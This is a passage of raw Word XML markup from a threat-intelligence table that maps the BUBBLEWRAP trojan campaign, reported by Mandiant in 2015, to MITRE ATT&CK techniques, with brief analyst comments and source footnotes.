          <w:p w14:paraId="0D49D74F" w14:textId="77777777" w:rsidR="00672F86" w:rsidRPr="00F808AD" w:rsidRDefault="00672F86" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64D5BBBA" w14:textId="77777777" w:rsidR="00672F86" w:rsidRPr="00F808AD" w:rsidRDefault="00672F86" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="768FBA17" w14:textId="77777777" w:rsidR="00672F86" w:rsidRPr="00F808AD" w:rsidRDefault="00672F86" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02E2F74D" w14:textId="4D92CC55" w:rsidR="00672F86" w:rsidRPr="00672F86" w:rsidRDefault="00672F86" w:rsidP="009D3C9B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00672F86">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>We know</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00672F86">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] The BUBBLEWRAP malware is installed with admin rights and the threat actors gain full access to the compromised machine </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="004C5547">
              <w:t>The BUBBLEWRAP Trojan may create a hidden system administrator account.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w14:paraId="24F96CF3" w14:textId="77777777" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23966061" w14:textId="23347C79" w:rsidR="00A77D6E" w:rsidRPr="00F808AD" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CBC6B07" w14:textId="3DE55FBB" w:rsidR="00A77D6E" w:rsidRPr="00F808AD" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F808AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve">TA005 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F808AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F808AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3362B606" w14:textId="5840F0E4" w:rsidR="00A77D6E" w:rsidRPr="00F808AD" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F808AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>T1036.005 Masquerading: Match Legitimate Name or Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="405CC423" w14:textId="08260614" w:rsidR="00A77D6E" w:rsidRPr="00F808AD" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F808AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="050106AC" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="00F808AD" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="336F7605" w14:textId="0AA93790" w:rsidR="00A77D6E" w:rsidRPr="00F808AD" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F808AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CEDCCC8" w14:textId="1062A563" w:rsidR="00A77D6E" w:rsidRPr="00F808AD" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79D6153B" w14:textId="6304202D" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F808AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>Rename second stage tool with benign name</w:t>
            </w:r>
            <w:r w:rsidR="00F808AD" w:rsidRPr="00F808AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve">. But this is on the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00F808AD" w:rsidRPr="00F808AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>DropBox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00F808AD" w:rsidRPr="00F808AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve"> server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00010518" w:rsidRPr="00ED5880" w14:paraId="746A53C3" w14:textId="77777777" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="791F210F" w14:textId="377CE244" w:rsidR="00010518" w:rsidRPr="00ED5880" w:rsidRDefault="00010518" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004F43B4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A442CFE" w14:textId="77777777" w:rsidR="00010518" w:rsidRPr="00ED5880" w:rsidRDefault="00010518" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA007 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="647EDF84" w14:textId="77777777" w:rsidR="00010518" w:rsidRPr="00ED5880" w:rsidRDefault="00010518" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1082 System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7251C396" w14:textId="48A61815" w:rsidR="00010518" w:rsidRPr="00ED5880" w:rsidRDefault="00650BEB" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004F43B4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45C93C44" w14:textId="77777777" w:rsidR="00010518" w:rsidRPr="00ED5880" w:rsidRDefault="00010518" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5419D066" w14:textId="77777777" w:rsidR="00010518" w:rsidRPr="00ED5880" w:rsidRDefault="00010518" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D5CAEC5" w14:textId="1E914793" w:rsidR="00010518" w:rsidRPr="00ED5880" w:rsidRDefault="00D0443B" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67A9B3F9" w14:textId="6E450ABE" w:rsidR="00010518" w:rsidRPr="00ED5880" w:rsidRDefault="007E4404" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64BC8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5547" w:rsidRPr="002D1D50" w14:paraId="1010A590" w14:textId="77777777" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56EB7826" w14:textId="3DE41130" w:rsidR="004C5547" w:rsidRPr="002D1D50" w:rsidRDefault="004C5547" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004F43B4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="226D2BD0" w14:textId="77777777" w:rsidR="004C5547" w:rsidRPr="002D1D50" w:rsidRDefault="004C5547" w:rsidP="002B57F6">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08" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51369484" w14:textId="1AD52EA1" w:rsidR="004C5547" w:rsidRPr="002D1D50" w:rsidRDefault="00C743A1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1102.002 Web Service: Bidirectional Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35EC7082" w14:textId="1340C63A" w:rsidR="004C5547" w:rsidRPr="002D1D50" w:rsidRDefault="00650BEB" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004F43B4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AA4FBED" w14:textId="77777777" w:rsidR="004C5547" w:rsidRPr="002D1D50" w:rsidRDefault="004C5547" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36617EA0" w14:textId="37623F71" w:rsidR="004C5547" w:rsidRPr="002D1D50" w:rsidRDefault="00C743A1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55439D8F" w14:textId="093D4801" w:rsidR="004C5547" w:rsidRPr="002D1D50" w:rsidRDefault="00D0443B" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7020AE08" w14:textId="36E56063" w:rsidR="004C5547" w:rsidRDefault="00532E65" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[6] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="004C5547">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Bubblewrap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="004C5547">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> communications</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E006432" w14:textId="64D128DE" w:rsidR="0094281B" w:rsidRPr="002D1D50" w:rsidRDefault="0094281B" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>not</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> via Dropbox server</w:t>
            </w:r>
            <w:r w:rsidR="00C20ED2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>, this Tech noted in ATT&amp;CK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="19"/>
      <w:tr w:rsidR="004C5547" w:rsidRPr="00ED5880" w14:paraId="2CDDE01D" w14:textId="77777777" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56DCC1D3" w14:textId="77777777" w:rsidR="004C5547" w:rsidRPr="00F808AD" w:rsidRDefault="004C5547" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E0497F6" w14:textId="77777777" w:rsidR="004C5547" w:rsidRPr="00F808AD" w:rsidRDefault="004C5547" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4146B02E" w14:textId="77777777" w:rsidR="004C5547" w:rsidRPr="00F808AD" w:rsidRDefault="004C5547" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FE19945" w14:textId="77777777" w:rsidR="004C5547" w:rsidRPr="00F808AD" w:rsidRDefault="004C5547" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CC1CDA0" w14:textId="77777777" w:rsidR="004C5547" w:rsidRPr="00F808AD" w:rsidRDefault="004C5547" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51FA39A2" w14:textId="77777777" w:rsidR="004C5547" w:rsidRPr="00F808AD" w:rsidRDefault="004C5547" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0781D2C6" w14:textId="77777777" w:rsidR="004C5547" w:rsidRPr="00F808AD" w:rsidRDefault="004C5547" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A7F9E05" w14:textId="77777777" w:rsidR="004C5547" w:rsidRPr="00F808AD" w:rsidRDefault="004C5547" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="20"/>
    </w:tbl>
    <w:p w14:paraId="16902BA0" w14:textId="77777777" w:rsidR="0077286F" w:rsidRPr="0077286F" w:rsidRDefault="0077286F" w:rsidP="0077286F"/>
    <w:p w14:paraId="0090637D" w14:textId="5E6F5A2F" w:rsidR="00B16144" w:rsidRDefault="003D46DB" w:rsidP="00B16144">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00B16144">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets | Mandiant</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00227A6C" w:rsidRPr="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[2015]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08301AC0" w14:textId="422D8B18" w:rsidR="005305F1" w:rsidRDefault="005305F1" w:rsidP="00B16144">
      <w:r w:rsidRPr="005305F1">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r w:rsidRPr="005305F1">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>BUBBLEWRAP Trojan Removal Report (enigmasoftware.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00167E32">
        <w:t xml:space="preserve"> (via Google</w:t>
      </w:r>
      <w:r w:rsidR="004C0FBA">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00167E32">
        <w:t xml:space="preserve"> a little more clarity on Lowball and </w:t>
      </w:r>
